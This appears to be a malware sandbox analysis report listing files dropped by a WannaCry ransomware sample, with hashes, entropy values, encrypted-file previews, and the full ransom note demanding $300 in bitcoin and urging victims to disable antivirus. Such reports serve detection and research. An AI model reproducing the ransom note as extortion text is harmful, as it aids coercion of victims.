                                Preview:WANACRY!.......T..Z.ee.6...%n....(.^U.f9&.(95....U..^....x.^..}....tm.......r.J-.\..q.?.#'.J...h...{z.$s.......c...j.P.......Z.,..>jf....F....S&N...f"..Y{F.E..mE...x....)}..U.x....{.j%L.j.~.5-..= ?2rK.#...+..@..e^U.-.....4I.4.p...D[.>s.....m...&........].~.............FG~.?b&Sb.5..zF.x.2...%T,N..N...q.j...*Yf....4......Y....+..]$.pJ.x...h. ..P+wZv.1..^.....!...Do.._.&..^.y.....c..@i.............!..PL..J..wp...rr.f/.<%..........jz3.y........*..a.T...?....v.m..=.?.f...m......H.Z..){.-.%8...v'.*..aL..E.LD\H...eSr.S2 Nq@..c`.....<J.....~B.,....VU[Y;.9.."Z=R.a.H....t..v....~..M..'IX.V.?, h..X........]....x..4B...0...".m!..:.......@...P..3n.....Q.....Z.....#.G4..GF..g.Y.;.}M.vV.n.>.}..... .e....G04(..m..5.sz.t5.4XO...._&f....nu.r~c.FZ........&C..y.H..........p..+..I..:?..sF.m....!TL]._.7?m.6=.snz.1.V.o.@Cc.2.B9.pP.....>......3....00...#}.vt.*..N....l$F<..8...KRz.n...dN3...5mL....A>.e..|Vd.Q\.[...2..j..R.I.....F.%@....!..G..17...%DX.z.a:]r.. %.X.6

                                C:\Users\user\Documents\BNAGMGSPLO\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Documents\BNAGMGSPLO\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Documents\BNAGMGSPLO\BJZFPPWAPT.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.809823740207784
                                Encrypted:false
                                SSDEEP:24:d/0XDribk6VH7RnvQKduSCYnrr4B0JTLDTZkPMLUxEyOpIz2G81L4j:iT+tFopK4YTGMgxIpQoQ
                                MD5:A52628A59EA347A54B21CA923D0FBFD7
                                SHA1:40F9C8382A35A4E43A661B2F7DB3A0CB48146293
                                SHA-256:E0F23E1E08B72EA7FCE676DC3783CF78C29C599E8F844704522E4807507BE3DB
                                SHA-512:D43704526B44C52F25706A569127F073D7055ED9DC163C114B8E98B251FCB3E305AF0B90FEE39184C909F0DE4287C5B1E83BAF36C0A3D4B6D515C70B5374E77E
                                Malicious:false
                                Reputation:unknown
                                Preview::.W+...'...M......l..r.f..r.$J... ga.2...k%.;X#.y5..R.......)T.9..5.&.(..4.:......'A.!...._M....D......H...\.>.(..zo].0{.~...)!+.VO.Cu.~.^&..um..R....(|.'(...p......p....g....k.p..4.L.!9e.o..B....@....l..Y.18.gE...R.T.m....c.2..F....~.ooUG`..h..:."T.N..]..].,2..nV...`.......V...4..z.6..4.oo...)/....o..9G9M....(..)Z.....;..!7....s$.....h`......Q..D......?./..e{.^...../..;..4*.X7.U....u....T..w......Y.}.....u....M.l.9W...).UR.....z.lW..r..2..w,.3.k..YV$!.oqO...L._`.....c.mU...j.I...eH..G..:O.3...u....e..4i..}.Z...E./.B8xu..5).= ....w..ah..w.*52'.d..8yK.....6.o.d..G.M..T.9.u.U.Y+..9>..r.......=...j..QE.:mg..S4........wc.e J..U.?.0|.p4e..~._....].&Z.p..`...]........^.-K..[.v}^m...{.6...=....N..$sI.h5S./....c^.HM.:q.AN.;oa....4...t!.t<....u...8x...'g..6@...9.q..Z....U2*.}E..YH1.g..'....N...j).....o..Lq....._.PztY...@...57... .Ka.....{..W......b.ojrg;}M.7j.....:}......u.E.....G..[.....d...x.....l.<n.......b.D..e.....@.'...1..9m..s%.

                                C:\Users\user\Documents\BNAGMGSPLO\BJZFPPWAPT.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839711662801909
                                Encrypted:false
                                SSDEEP:24:bk3On3cfgjRStSO6FZKJYM+JGRgl8x54n7XdYLOs8f5SuVubQKq765jY0bQqqEAd:bken30gueFc2MHSl8x5A7kAIuVaQKQ6q
                                MD5:C911F65DDCD2C34239A9252C0428DD67
                                SHA1:DBD1D3BFC5CDDBCD354F0A27BE4DD67B27735583
                                SHA-256:8B7310E1763C2122B81841D4A997893E7D602DA4A79925C9812D86FAF809E4CD
                                SHA-512:7226E74768A0A6921A1D9CB4D4360368C900331C3210C6BD57506CF56E86D28E312A6454DC511D192A4DA25534A7F9D5006E0856E8B80CC993A59879BFDD5552
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........x....qT...'/.P&.]..L....a...IU......y.Y....Q....?([.W.`.P).....L^..i......'......5.8.....*aO4>.Db...R..[.SA@.....$`.hdr.|)X..."...!....!O.eJ.)..........V....T....q.+..r..L....'y.......?.......)....Q....u...P...{..N.n.z....Z...1E...<.qO.znu.............N].^...?>#Mff.@v..F.>...#..i...MU...a...S.q.....Qh.+L.g(.y.4.e)-t...V.7.:.J.S5{I..K...D..`.or.;.A.......!...,w:..\pE]..{.r............YF4...~...jH....-.b/.E].w>.....>0S.;kP......?.s&...k.5."#.A...8...`..`"7KHhI..z....k.J.{AY.!.<.......!Y..?MR..tC..],.I...r.,...Y.....w....Hj..3...n.K.......... ......$l...HX..k...$.6.._:3?e.C'Rq|{)j.R......]..R.)....R..S>...=t..RW.$.S.....{....B.a5..q5h.E.n{..).d..R..=U..gE.,J..v5f.....u.Y...rd...\.8$.....S.p...]7M.x..%0...^.e..W..0.="M.6.xd..e....Wh..e/.y...k}.....hW<.yO..D.g.k-.EV(.~.Uj.tH.q.*".d0...lT.h...u'........y.\.N.1R09&.(.J....J..X..y..+*....*..CQ..{.Zs._f..R...IU.z...B...C-.NryfT...y.ucq..XH.B.y?.z......9..aD!....~&.......n..XC..g.8.^.*.

                                C:\Users\user\Documents\BNAGMGSPLO\BJZFPPWAPT.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839711662801909
                                Encrypted:false
                                SSDEEP:24:bk3On3cfgjRStSO6FZKJYM+JGRgl8x54n7XdYLOs8f5SuVubQKq765jY0bQqqEAd:bken30gueFc2MHSl8x5A7kAIuVaQKQ6q
                                MD5:C911F65DDCD2C34239A9252C0428DD67
                                SHA1:DBD1D3BFC5CDDBCD354F0A27BE4DD67B27735583
                                SHA-256:8B7310E1763C2122B81841D4A997893E7D602DA4A79925C9812D86FAF809E4CD
                                SHA-512:7226E74768A0A6921A1D9CB4D4360368C900331C3210C6BD57506CF56E86D28E312A6454DC511D192A4DA25534A7F9D5006E0856E8B80CC993A59879BFDD5552
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........x....qT...'/.P&.]..L....a...IU......y.Y....Q....?([.W.`.P).....L^..i......'......5.8.....*aO4>.Db...R..[.SA@.....$`.hdr.|)X..."...!....!O.eJ.)..........V....T....q.+..r..L....'y.......?.......)....Q....u...P...{..N.n.z....Z...1E...<.qO.znu.............N].^...?>#Mff.@v..F.>...#..i...MU...a...S.q.....Qh.+L.g(.y.4.e)-t...V.7.:.J.S5{I..K...D..`.or.;.A.......!...,w:..\pE]..{.r............YF4...~...jH....-.b/.E].w>.....>0S.;kP......?.s&...k.5."#.A...8...`..`"7KHhI..z....k.J.{AY.!.<.......!Y..?MR..tC..],.I...r.,...Y.....w....Hj..3...n.K.......... ......$l...HX..k...$.6.._:3?e.C'Rq|{)j.R......]..R.)....R..S>...=t..RW.$.S.....{....B.a5..q5h.E.n{..).d..R..=U..gE.,J..v5f.....u.Y...rd...\.8$.....S.p...]7M.x..%0...^.e..W..0.="M.6.xd..e....Wh..e/.y...k}.....hW<.yO..D.g.k-.EV(.~.Uj.tH.q.*".d0...lT.h...u'........y.\.N.1R09&.(.J....J..X..y..+*....*..CQ..{.Zs._f..R...IU.z...B...C-.NryfT...y.ucq..XH.B.y?.z......9..aD!....~&.......n..XC..g.8.^.*.

                                C:\Users\user\Documents\BNAGMGSPLO\BNAGMGSPLO.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823236884267783
                                Encrypted:false
                                SSDEEP:24:gzUnrM1bUIHYndit0DrQOArGWD7trMMwZbfOc2MSBC2ugH6hOi3oa:g4rM1bNKQtqr46k7yfZbfOc558q9
                                MD5:4EF7035955F13ECF7C0C2A3451C01E91
                                SHA1:5E6DDFA177EEB10C0AF3B8EFE7A23B7E2C4FFE9A
                                SHA-256:F2525F0C7697DEC16A532C319E282471A97944A6C74132B0907E74A1AED22342
                                SHA-512:292061F65DFE9BD8785134094A527327E4BD81C174C241C4A4E7CBCB1C49C4F629CD58F6DD7872F6F400ADBCEAD0307C2406C3A0D29C2952159B198E302B50EF
                                Malicious:false
                                Reputation:unknown
                                Preview:..."\..p"..0P.Q...oA.o.O...kN.1..1..5.~f&Fz.e^....9 h".@.... w......toK..v."..7)`.Q.....5..........j.,..6X3....%........N......Z......X1...)hK.h{.|.6.....<a.T.l.~.k.3..Q..=J4......3E.k`..@..R.I...]R).Z"W..Yu..dN../......]...F.@8.G.N......8g[;..=.....(.........j./a...F.IwP......4./....'.........V.9...z.T.,..X...$......j...8.L...W.G.a.Eu$...e....Z..)|.N.d.m|?.C..y,..9.O.......j.H.c....=..C`.A...w...\..c(.kr..R'.w(/.8..{....B.z#n..,N(!9....=.#<r....9..*>.~J.../..Nb......e.s...^k5.F.z!C..(uh|....J..........g......?..I_B._.I..~..v!..Z..........%...z...w..o7#....)..L~......w+.".[r.../{....f._HA3..H.@.U:....q*.....&.....RQ..'.k..FX0.).L...#W......s>.xB.0...^.~.4A....V!..p.(^.A...?...EM..]..mb>..%.l...~....<...F.=X..*.fD&....1..3..4....&2[T......IOa.*..}uY+^#........?_..II.u-.jF5...{a.+E....Dm..).....k.4...dFs..k..uC...L... .1....2...7(..C...........Kk.Hb....oT.......5..{.T.+.....#..F.J...^..E..8.\W.WB.....d.W.5...T..;..".

                                C:\Users\user\Documents\BNAGMGSPLO\BNAGMGSPLO.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846599426002445
                                Encrypted:false
                                SSDEEP:24:bk+/whbrmnvTULexz/dM/VFLJLtOLwr5ZSGatqE6DyGqzrk2010lwUU/zhXeS4:bkIAmvTUqz/dM/dLAw3jatqE6uDzo2gM
                                MD5:FB120DDBA971C0447F30B49846328258
                                SHA1:968E4BC6D8EB1681E00F9E29E8A0BF84ECBAE997
                                SHA-256:2142B5513B7904294FE806DBA4A95143C58E6311C2DA16F0D0C46B0C9E42BF25
                                SHA-512:B6CDEB19901E204A089333D93AFB648F8EC99E26AB4181A57DE10CE4364228126559B261BBB84E6A75EF6C198EE03AB34E60EF55F1F1B5E6AC427B63C7BB93F7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....(\.k.....~......Jey].9oV..NP...V..!....%.PB.u.....*....(..t.......G..I+Y..F.".......M..HH.P.1.h?.;.....-kPd+'oV.w.f@.h..=~.,5.~..)yV./..ps.kd.......\i...2P+..X.`.8'..-...'d..G.........xV..p...S.l......,g.{H.,|.!.cX.h.=..7...........8..B.F...............0._f..........c|F........:....f...lA.F=A.-.....,Ip.%......eP.}....'.y.O.Z....DlY.....>..,...+p..Fhh..a..i.SX[.q.K.eP...7..y......... .*..(4.Eb;.....Y.....G$.Zt._4n..c..U/.......4. s@.".#0..N...I.#0..p.....w.hR.E.7S.....q.e..n.q.Z.....T.=...3...t1..Vh.hL_@..[m..1......|y..6..C.@.>..r.G.fJ`.5.8.....-.[*. ...U...H.......7/Q`.Q....aR......".<5~.).9.......Ne...V....--L%..(.8O....%....z.=.A..xb_..6.'...?,=[....@wbg..aoz.pM9.R..C..[=w.,.Hy+.;..a 5|"....|[).q...e../\.*.i....ob.:.6..b.. n.!..{rtK.^..f....\K..BF...}.}.....{...1...A3 V1MHQB.....(..k/........s,.g....j.M.A..&jH..........10V.`K.{o.(...H....(..s......q....$rLP..S.[.d.~.O...d......;!##..b.RQ....t....b4.D..Gp..s.WK...

                                C:\Users\user\Documents\BNAGMGSPLO\BNAGMGSPLO.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846599426002445
                                Encrypted:false
                                SSDEEP:24:bk+/whbrmnvTULexz/dM/VFLJLtOLwr5ZSGatqE6DyGqzrk2010lwUU/zhXeS4:bkIAmvTUqz/dM/dLAw3jatqE6uDzo2gM
                                MD5:FB120DDBA971C0447F30B49846328258
                                SHA1:968E4BC6D8EB1681E00F9E29E8A0BF84ECBAE997
                                SHA-256:2142B5513B7904294FE806DBA4A95143C58E6311C2DA16F0D0C46B0C9E42BF25
                                SHA-512:B6CDEB19901E204A089333D93AFB648F8EC99E26AB4181A57DE10CE4364228126559B261BBB84E6A75EF6C198EE03AB34E60EF55F1F1B5E6AC427B63C7BB93F7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....(\.k.....~......Jey].9oV..NP...V..!....%.PB.u.....*....(..t.......G..I+Y..F.".......M..HH.P.1.h?.;.....-kPd+'oV.w.f@.h..=~.,5.~..)yV./..ps.kd.......\i...2P+..X.`.8'..-...'d..G.........xV..p...S.l......,g.{H.,|.!.cX.h.=..7...........8..B.F...............0._f..........c|F........:....f...lA.F=A.-.....,Ip.%......eP.}....'.y.O.Z....DlY.....>..,...+p..Fhh..a..i.SX[.q.K.eP...7..y......... .*..(4.Eb;.....Y.....G$.Zt._4n..c..U/.......4. s@.".#0..N...I.#0..p.....w.hR.E.7S.....q.e..n.q.Z.....T.=...3...t1..Vh.hL_@..[m..1......|y..6..C.@.>..r.G.fJ`.5.8.....-.[*. ...U...H.......7/Q`.Q....aR......".<5~.).9.......Ne...V....--L%..(.8O....%....z.=.A..xb_..6.'...?,=[....@wbg..aoz.pM9.R..C..[=w.,.Hy+.;..a 5|"....|[).q...e../\.*.i....ob.:.6..b.. n.!..{rtK.^..f....\K..BF...}.}.....{...1...A3 V1MHQB.....(..k/........s,.g....j.M.A..&jH..........10V.`K.{o.(...H....(..s......q....$rLP..S.[.d.~.O...d......;!##..b.RQ....t....b4.D..Gp..s.WK...

                                C:\Users\user\Documents\BNAGMGSPLO\DUUDTUBZFW.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.804780018876966
                                Encrypted:false
                                SSDEEP:24:9D31lcqYi/49DE8dppMbsuONsnbj2INWhuUWn8dLuV40pPArA/5G1:tXYm4DVMbDu0uCdf8dLDyA+0
                                MD5:C231839DC1C5CE1D32565E2FFEAC4FD8
                                SHA1:8A99C026BAD317D1FE7CDC4F9E1EB8EB4C7EBD67
                                SHA-256:560DEE3466145A22C6F1C42878E64BBE48FDB0A1465EA73AF2704ADDC307B780
                                SHA-512:87ACD03D5A43AEFEE06654E7F3A01E8BEFABE4C4CD3720E959B6E52A8B17656B9A8D958DD4BA1B25FD6971345C4B6B3443ED14CCA76C443CC71F1BC31A0C8FF6
                                Malicious:false
                                Reputation:unknown
                                Preview:.."HS....E0...L..Q.D4#..jy..V..[c...]/e.G.^........r...5T........QM...h....^..........`...s..,.m.a.A.k.L.Gi...XM.......wX.{00.....4\..e4|.#.}..F. .r..8..U.l..*2....rj......Cd`.l.hX....cx44.w......K......T.z%......wmC.hB.e.....p...GP..U..7.............a.;D...P..&9.@\..xx.#.R.N ...)X.k...\...W]T.=..e..s....0.KQm..+0.9..oY........x.J3.b..6RBMFg.?......q.98Z....9..0x]..x.U..`$.....6H....E.-..p......E..:..J....p....]......wv.46..........J.`.?..r...........4...=.b.....-..j...{....R.-.Ql.V9.:T.Og^..n..G....~:x.@.]..b........`5."...k..rg.Y.7..A..f....Q..9PR.Bg~..Z#...[......".QQT.9....l...xS]'.mR....."....(.8......G....3/....x...<!w.Z..K.....!.D.Pdg...j..o.;.'t.u%...r5%....K\..J...5.......d..n.w.b.U.W.....t.v.J..G....NC..^...=N<.+...$........;..8.6.~...[....C......`.~*.-..$.v........E..4.q.z4!J.{.......Bql.7c....G2}0.$..Wp...E.........A(!......:.3.3..n....S.kX^.l0w..s.f".)...B.Q.R.}.]X.......o....._..U..Asf...9.~n..i{.../%....9F}....V.

                                C:\Users\user\Documents\BNAGMGSPLO\DUUDTUBZFW.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84142502792671
                                Encrypted:false
                                SSDEEP:24:bkMl3CfUotsQO4+KxuvRV8isxktI2M2Sm18wiOy3eskeJTHWd4U/z5NW/iJOaxei:bkK3cUvQObKxaVAkO2MHmDeb3JH6lNuW
                                MD5:09602DD7B3EB4662F44B728AB9C27C62
                                SHA1:A5C8CDED88DFB8E34596F810A18E016234E51F45
                                SHA-256:D7E01A3CF53C6932A4C7F97931E507A788FEB8A10FB0167452D8D7F7EB40357C
                                SHA-512:03EA3CB43BA91466EEA7DA7A6FEE0D2FC76D637019078B3151735764D44D183E46516E02A22D9F62D4C2B6C0BA673A888ECD2D8FD0EF52620F419406C3EF78EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!............c..Jf.2<..{..;:}....H........"..tw..@.Y.212B.a.R;.eG...DVu.m..36...Y.[.<....:..E]..}...5W....iJ...x.@.w\.E.=.".L.>..M...2.{Oezw.../.QE..xY$.....k...s...*Y.\.vg........ 6g.\.&.A....]?'&.....R.. l.......{...e....Fm\..y..YF...ap......m...&.g...................6..1m=...Ih.t..fSm......n3\..2..;.s8.7....w.#......ci.M.E2..S2........eN...qy2...W..-.u.{...R...]]..u...........U].Yp .=....7.i.z.}..j..>~..>..G....c.K.........:...l.YXy...W.t..-p..:....2.X.SJ..1.w..8.-....BhglaE .3....Z...I...:X97..._.`gp:@q)iZ....&!f.G..}..+...*.HL.i....]WA$.=.....m0.....5..I.!8..._>..QM.w|...B.....C......5.~Mu..}.cE.~t...}V......rO._qZf4pxk.GD.{\.......g.z......<.wk.:...`.t.......#..:..#.....x.........#...u].GxZ.D......(e<.@.....a?.)F.Z.D@yo...\.D...O`..8...k......48{.$.A......?_....|.4Pg....'.5......5.w'.xh\D!.....L..._^....UG.qD.....5..0.<E...6..N>.J..,y..z...`..P...4.....v.b.V....S....2....a~1..h$.&%.B/-....#.E5D.?../..0.T...j..Q.T.......B....

                                C:\Users\user\Documents\BNAGMGSPLO\DUUDTUBZFW.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84142502792671
                                Encrypted:false
                                SSDEEP:24:bkMl3CfUotsQO4+KxuvRV8isxktI2M2Sm18wiOy3eskeJTHWd4U/z5NW/iJOaxei:bkK3cUvQObKxaVAkO2MHmDeb3JH6lNuW
                                MD5:09602DD7B3EB4662F44B728AB9C27C62
                                SHA1:A5C8CDED88DFB8E34596F810A18E016234E51F45
                                SHA-256:D7E01A3CF53C6932A4C7F97931E507A788FEB8A10FB0167452D8D7F7EB40357C
                                SHA-512:03EA3CB43BA91466EEA7DA7A6FEE0D2FC76D637019078B3151735764D44D183E46516E02A22D9F62D4C2B6C0BA673A888ECD2D8FD0EF52620F419406C3EF78EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!............c..Jf.2<..{..;:}....H........"..tw..@.Y.212B.a.R;.eG...DVu.m..36...Y.[.<....:..E]..}...5W....iJ...x.@.w\.E.=.".L.>..M...2.{Oezw.../.QE..xY$.....k...s...*Y.\.vg........ 6g.\.&.A....]?'&.....R.. l.......{...e....Fm\..y..YF...ap......m...&.g...................6..1m=...Ih.t..fSm......n3\..2..;.s8.7....w.#......ci.M.E2..S2........eN...qy2...W..-.u.{...R...]]..u...........U].Yp .=....7.i.z.}..j..>~..>..G....c.K.........:...l.YXy...W.t..-p..:....2.X.SJ..1.w..8.-....BhglaE .3....Z...I...:X97..._.`gp:@q)iZ....&!f.G..}..+...*.HL.i....]WA$.=.....m0.....5..I.!8..._>..QM.w|...B.....C......5.~Mu..}.cE.~t...}V......rO._qZf4pxk.GD.{\.......g.z......<.wk.:...`.t.......#..:..#.....x.........#...u].GxZ.D......(e<.@.....a?.)F.Z.D@yo...\.D...O`..8...k......48{.$.A......?_....|.4Pg....'.5......5.w'.xh\D!.....L..._^....UG.qD.....5..0.<E...6..N>.J..,y..z...`..P...4.....v.b.V....S....2....a~1..h$.&%.B/-....#.E5D.?../..0.T...j..Q.T.......B....

                                C:\Users\user\Documents\BNAGMGSPLO\EEGWXUHVUG.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.808499372351159
                                Encrypted:false
                                SSDEEP:24:4A2tf8Kfb4rT01v6RinnoLHwXMCgPNqOKVw:1W34rT01v6SiHKMtPNqOp
                                MD5:E8BE837A28138A93595B8A56E959F0B6
                                SHA1:86FAD0D7F15BE9024D32A6A2B2143C18E61275AF
                                SHA-256:78960E67EE8F3F3C39B8CFBE165B14F8AB36CCB4C36BF50CA6658879DD2450CA
                                SHA-512:542613F56A999C5DBC0754BEF11AB92C1CDE7AB2BCE5EF0EB2D8BBFD59A11E5841C5ECC811B1B8458C75CE4770C1B5327769C1F9DACE3A4C910CCD338903B9DE
                                Malicious:false
                                Reputation:unknown
                                Preview:........J.e..O...0.....cr......4...D<.~.7.N.H.S.+4c.`.hN.qp....t?....G..~.p..+........Y.K.}.. :...PY.@.b/.I.*s..N:.F......d.y.....h......4.Xc........:=.P.i.!3...t.&.E...Q.=.U.....v14....j.K.'C*^+.]..mj..l.b=...........~1....l=..AQm^..x7..?@=... a.s.h....V%`........&.t.l...X...H).].....&.O.K..7....P.z{h1....2....K.<M..5...H.mg_.......y$|.P4+...j...;B.@......R...... ....,e..).e.Ii.t...AL.5.....Wt...!t..\1..Q.3...)\D.c...>4;4...'.y..Yh.R......}/!=...R)..l."=%..0z2...S.f...._>....T........z6.5d%.C."...b...>.tN......Y..7.."#x..r..9.>...}..cP.q.X........._.^..4T-q...Cr/.F....Y.7.....=.|~...^.,v.S.uQA.|.?......2.T../.=2.4...$?./'.x....&.".%R.l.....llI..?..;....[.P.~......]....Mz...A.C....4.W.h.!dF.~...v.,j...F..Q.....@.K...$.L..Y....uO.)...TsN.`.gx.?..I..I^!...S........=........;.FO...X....?.4v...@@d...~.V.CQ.CJ.#U.....m...|..Lk.WL.K.Ww....F..5?.n......0...6RM~..2I..=.;....gB.(.T.\..u.@u.,.r.Dr..o.5..1.5..7G.q..V.Z..._J*?.......w.......

                                C:\Users\user\Documents\BNAGMGSPLO\EEGWXUHVUG.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846628120539456
                                Encrypted:false
                                SSDEEP:24:bk0x1ZcUjQB+Cc9RkrVWAd38Sc3XhHWapGm/0IYKJvtsgpU3Qc5WaqxB1HVyOC28:bk6ZcUdCIRkrVW6iBHPp5zYKbsgpElzv
                                MD5:3325B106A0C5675F205DA5F0A44B57EC
                                SHA1:D0E63863AF7503A19DE044D3824A0C227EFEB61E
                                SHA-256:389A6597734B76AA4AB0443650B81768D6F90FB28D4BCC2D11519AF08C93136D
                                SHA-512:55172FCAC87AFD1D56036256F4F98B72EA4171934618E46B1B9DE335E03DA5C1C97289252F12C12E583E655B9476EAC9BCA35A03B81C66F7D8350CF318BEFDA8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....N..E....hI.....E5..B ..-%..VCm.p..;.p....<...7B|N..`W g......",. O..+X.w....)..w....+..@...}..;ny.T.......8....8|A.p>..%.o..%.'...6....'..........?a...]...n.g....B.........*.6#.@.$..2iz....t...GE.~O..?.".z......I..9..!..q\.............?..b.I'.............`.}..)..R87v>..F..1n.5H..:.<.o..'LHkf.E...R...z.....]..#..ynH.[.c...c.H....e......^.J]`0GW..P...N.....G}%..F..d......Q.......fXK..#.B.-fr...1C.Z..TK...V...*...e.e.R...C.3........D+6..A...h........'mbI.P^_b.......u{!.]..c.>..-}.V..$Z..s..D.g.....Cb....y.o&....)p...h..(..g......A........2.T.2k....g.[.0..#.p...9..q.j1..+..b.n.......E..MS.....v......Z.......L..6.Z.....Gyp.L...T_...,.#7.{....e..V.....v2&.q...X4....:..2.9....6.. ...M6s..-..S..V...G...@O......C.Zx.........N..W...=.c...X9.. t.`CE.........P..s.r#.@.p&B...!.v.3.{.X...*!-...<...K..v.q.|.:.V.C!Kf8:DT6.fe.P*..O..I.lH.}<.....uq........L..d..u..zCdu.1....|......Y5A....2k.........J..'.R.o&9..<....x..3Ko.&/.l.@.."....5....T...b.".

                                C:\Users\user\Documents\BNAGMGSPLO\EEGWXUHVUG.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846628120539456
                                Encrypted:false
                                SSDEEP:24:bk0x1ZcUjQB+Cc9RkrVWAd38Sc3XhHWapGm/0IYKJvtsgpU3Qc5WaqxB1HVyOC28:bk6ZcUdCIRkrVW6iBHPp5zYKbsgpElzv
                                MD5:3325B106A0C5675F205DA5F0A44B57EC
                                SHA1:D0E63863AF7503A19DE044D3824A0C227EFEB61E
                                SHA-256:389A6597734B76AA4AB0443650B81768D6F90FB28D4BCC2D11519AF08C93136D
                                SHA-512:55172FCAC87AFD1D56036256F4F98B72EA4171934618E46B1B9DE335E03DA5C1C97289252F12C12E583E655B9476EAC9BCA35A03B81C66F7D8350CF318BEFDA8
                                Malicious:false
                                Reputation:unknown
